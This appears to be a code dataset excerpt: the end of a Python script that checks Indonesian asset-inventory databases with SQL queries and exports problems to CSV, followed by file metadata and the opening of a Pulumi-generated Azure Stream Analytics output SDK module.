a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a
LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBCR d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a
LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBDR d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub,
a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen,
a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a
LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda
LEFT JOIN
(
SELECT * FROM Ta_KIBER d WHERE d.Kd_Riwayat = 1
) c ON a.IDPemda = c.IDPemda AND (a.No_Urut - c.No_Urut) = 1
WHERE a.Kd_Riwayat = 3 AND ((a.Kondisi = 1 AND b.Kondisi = 3) OR (a.Kondisi = 1 AND c.Kondisi = 3))
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
    print("------Permasalahan 5 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    writeToCsv.writerow(['Permasalahan 5: Solusi Penyesuaian kondisi di KIB dan riwayat.'])
    writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
    writeToCsv.writerows(sourceRow)
# --- Check 6: intentionally skipped ---
print("""
------Memeriksa Permasalahan 6-------
SKIPPED""")
# --- Check 7: booking date earlier than acquisition date on the parent KIB rows ---
print("""
------Memeriksa Permasalahan 7-------
Permasalahan 7 yaitu Tanggal Pembukuan lebih kecil dari tanggal perolehan""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_A a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_B a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_C a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_D a WHERE Tgl_Pembukuan < Tgl_Perolehan
UNION ALL
SELECT a.IDPemda, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIB_E a WHERE Tgl_Pembukuan < Tgl_Perolehan
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
    print("------Permasalahan 7 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    writeToCsv.writerow(['Permasalahan 7: Solusi penyesuaian sesuaikan tanggal pembukuan minimum sama dengan tanggal perolehan'])
    # NOTE(review): this header lists Tgl_Dokumen/No_Dokumen but the SELECT
    # above does not return them — header has 19 columns vs 17 in the rows;
    # confirm and align.
    writeToCsv.writerow(['IDPemda', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
    writeToCsv.writerows(sourceRow)
# --- Check 8: Kd_KA mismatch between history and parent KIB ---
# NOTE(review): the printed description below is a copy-paste of check 7's
# text, while the SQL actually compares a.Kd_KA != b.Kd_KA; text is a runtime
# string so it is left untouched here — flag for correction.
print("""
------Memeriksa Permasalahan 8-------
Permasalahan 8 yaitu Tanggal Pembukuan lebih kecil dari tanggal perolehan""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE a.Kd_KA != b.Kd_KA
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
    print("------Permasalahan 8 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    writeToCsv.writerow(['Permasalahan 8: Solusi Penyesuaian Kode KA riwayat mengikuti kode KA induk'])
    writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
    writeToCsv.writerows(sourceRow)
# --- Check 9: NULL booking date / acquisition date / useful life on parent or history rows ---
print("""
------Memeriksa Permasalahan 9-------
Permasalahan 9 yaitu Terdapat data Tanggal Pembukuan, Tanggal Perolehan, dan Masa Manfaat yang tidak diisi baik pada KIB Induk maupun KIB Riwayat""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, 0 AS Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
NULL AS Ket_MM
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' WHEN b.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Induk NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' WHEN b.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Induk NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' WHEN b.Masa_Manfaat IS NULL THEN 'MM Induk NULL' END AS Ket_MM
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR b.Tgl_Perolehan IS NULL OR b.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL OR b.Masa_Manfaat IS NULL
UNION ALL
SELECT a.IDPemda, 0 AS Kd_Id, 0 AS No_Urut, 0 AS Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, NULL AS Tgl_Dokumen, NULL AS No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga, a.Masa_Manfaat,
CASE WHEN a.Tgl_Perolehan IS NULL THEN 'Tgl_Perolehan Riwayat NULL' END AS Ket_Perolehan,
CASE WHEN a.Tgl_Pembukuan IS NULL THEN 'Tgl_Pembukuan Riwayat NULL' END AS Ket_Pembukuan,
CASE WHEN a.Masa_Manfaat IS NULL THEN 'MM Riwayat NULL' END AS Ket_MM
FROM Ta_Lainnya a WHERE a.Tgl_Perolehan IS NULL OR a.Tgl_Pembukuan IS NULL OR a.Masa_Manfaat IS NULL
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
    print("------Permasalahan 9 Passed-------")
else:
    print("------Terdapat ",result," permasalahan-------")
    writeToCsv.writerow(['Permasalahan 9: Solusi isi data Tanggal Pembukuan, Tanggal Perolehan, dan Masa Manfaat sesuai dengan yang seharusnya terisi'])
    writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga', 'Masa_Manfaat', 'Ket_Perolehan', 'Ket_Pembukuan', 'Ket_MM'])
    writeToCsv.writerows(sourceRow)
# Signal completion.
done = True
print("Setup selesai, anda dapat menutup aplikasi ini. Terimakasih telah menggunakan aplikasi ini. Silakan buka file output.csv untuk melihat file-file bermasalah dan solusinya.")
# NOTE(review): selesai() loops until `status` is truthy, but this keeps it
# False — the spinner thread never stops and the process may not exit;
# presumably this was meant to be `status = True`. TODO confirm.
status = False
# t = threading.Thread(target = selesai)
# t.start()
| 69.429975
| 361
| 0.721495
| 5,134
| 28,258
| 3.719322
| 0.051227
| 0.076512
| 0.035402
| 0.014664
| 0.882954
| 0.882587
| 0.874051
| 0.869547
| 0.86431
| 0.834564
| 0
| 0.016466
| 0.148949
| 28,258
| 407
| 362
| 69.429975
| 0.777538
| 0.005237
| 0
| 0.631436
| 0
| 0.273713
| 0.843983
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01084
| false
| 0.02981
| 0.01084
| 0
| 0.02439
| 0.089431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
309d1c06f8c7a4ab349f5afc4160afb6700eb987
| 27,095
|
py
|
Python
|
sdk/python/pulumi_azure/streamanalytics/output_function.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/streamanalytics/output_function.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/streamanalytics/output_function.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['OutputFunctionArgs', 'OutputFunction']
@pulumi.input_type
class OutputFunctionArgs:
    # Input bag for creating an OutputFunction resource.  Generated by the
    # Pulumi Terraform Bridge; the @pulumi.input_type decorator drives
    # serialization via the pulumi.get/pulumi.set accessors below.
    def __init__(__self__, *,
                 api_key: pulumi.Input[str],
                 function_app: pulumi.Input[str],
                 function_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 stream_analytics_job_name: pulumi.Input[str],
                 batch_max_count: Optional[pulumi.Input[int]] = None,
                 batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a OutputFunction resource.
        :param pulumi.Input[str] api_key: The API key for the Function.
        :param pulumi.Input[str] function_app: The name of the Function App.
        :param pulumi.Input[str] function_name: The name of the function in the Function App.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
        :param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
        :param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
        :param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
        """
        # Required inputs are always recorded.
        pulumi.set(__self__, "api_key", api_key)
        pulumi.set(__self__, "function_app", function_app)
        pulumi.set(__self__, "function_name", function_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)
        # Optional inputs are recorded only when explicitly provided, so the
        # provider can apply its own defaults for absent values.
        if batch_max_count is not None:
            pulumi.set(__self__, "batch_max_count", batch_max_count)
        if batch_max_in_bytes is not None:
            pulumi.set(__self__, "batch_max_in_bytes", batch_max_in_bytes)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter(name="apiKey")
    def api_key(self) -> pulumi.Input[str]:
        """
        The API key for the Function.
        """
        return pulumi.get(self, "api_key")

    @api_key.setter
    def api_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "api_key", value)

    @property
    @pulumi.getter(name="functionApp")
    def function_app(self) -> pulumi.Input[str]:
        """
        The name of the Function App.
        """
        return pulumi.get(self, "function_app")

    @function_app.setter
    def function_app(self, value: pulumi.Input[str]):
        pulumi.set(self, "function_app", value)

    @property
    @pulumi.getter(name="functionName")
    def function_name(self) -> pulumi.Input[str]:
        """
        The name of the function in the Function App.
        """
        return pulumi.get(self, "function_name")

    @function_name.setter
    def function_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "function_name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="streamAnalyticsJobName")
    def stream_analytics_job_name(self) -> pulumi.Input[str]:
        """
        The name of the Stream Analytics Job. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "stream_analytics_job_name")

    @stream_analytics_job_name.setter
    def stream_analytics_job_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "stream_analytics_job_name", value)

    @property
    @pulumi.getter(name="batchMaxCount")
    def batch_max_count(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum number of events in each batch that's sent to the function. Defaults to `100`.
        """
        return pulumi.get(self, "batch_max_count")

    @batch_max_count.setter
    def batch_max_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_max_count", value)

    @property
    @pulumi.getter(name="batchMaxInBytes")
    def batch_max_in_bytes(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
        """
        return pulumi.get(self, "batch_max_in_bytes")

    @batch_max_in_bytes.setter
    def batch_max_in_bytes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_max_in_bytes", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class _OutputFunctionState:
    # State bag used when looking up / filtering existing OutputFunction
    # resources.  Unlike OutputFunctionArgs, every field is optional here,
    # and each is recorded only when explicitly provided.
    def __init__(__self__, *,
                 api_key: Optional[pulumi.Input[str]] = None,
                 batch_max_count: Optional[pulumi.Input[int]] = None,
                 batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
                 function_app: Optional[pulumi.Input[str]] = None,
                 function_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 stream_analytics_job_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering OutputFunction resources.
        :param pulumi.Input[str] api_key: The API key for the Function.
        :param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
        :param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
        :param pulumi.Input[str] function_app: The name of the Function App.
        :param pulumi.Input[str] function_name: The name of the function in the Function App.
        :param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
        :param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
        """
        if api_key is not None:
            pulumi.set(__self__, "api_key", api_key)
        if batch_max_count is not None:
            pulumi.set(__self__, "batch_max_count", batch_max_count)
        if batch_max_in_bytes is not None:
            pulumi.set(__self__, "batch_max_in_bytes", batch_max_in_bytes)
        if function_app is not None:
            pulumi.set(__self__, "function_app", function_app)
        if function_name is not None:
            pulumi.set(__self__, "function_name", function_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if stream_analytics_job_name is not None:
            pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)

    @property
    @pulumi.getter(name="apiKey")
    def api_key(self) -> Optional[pulumi.Input[str]]:
        """
        The API key for the Function.
        """
        return pulumi.get(self, "api_key")

    @api_key.setter
    def api_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_key", value)

    @property
    @pulumi.getter(name="batchMaxCount")
    def batch_max_count(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum number of events in each batch that's sent to the function. Defaults to `100`.
        """
        return pulumi.get(self, "batch_max_count")

    @batch_max_count.setter
    def batch_max_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_max_count", value)

    @property
    @pulumi.getter(name="batchMaxInBytes")
    def batch_max_in_bytes(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
        """
        return pulumi.get(self, "batch_max_in_bytes")

    @batch_max_in_bytes.setter
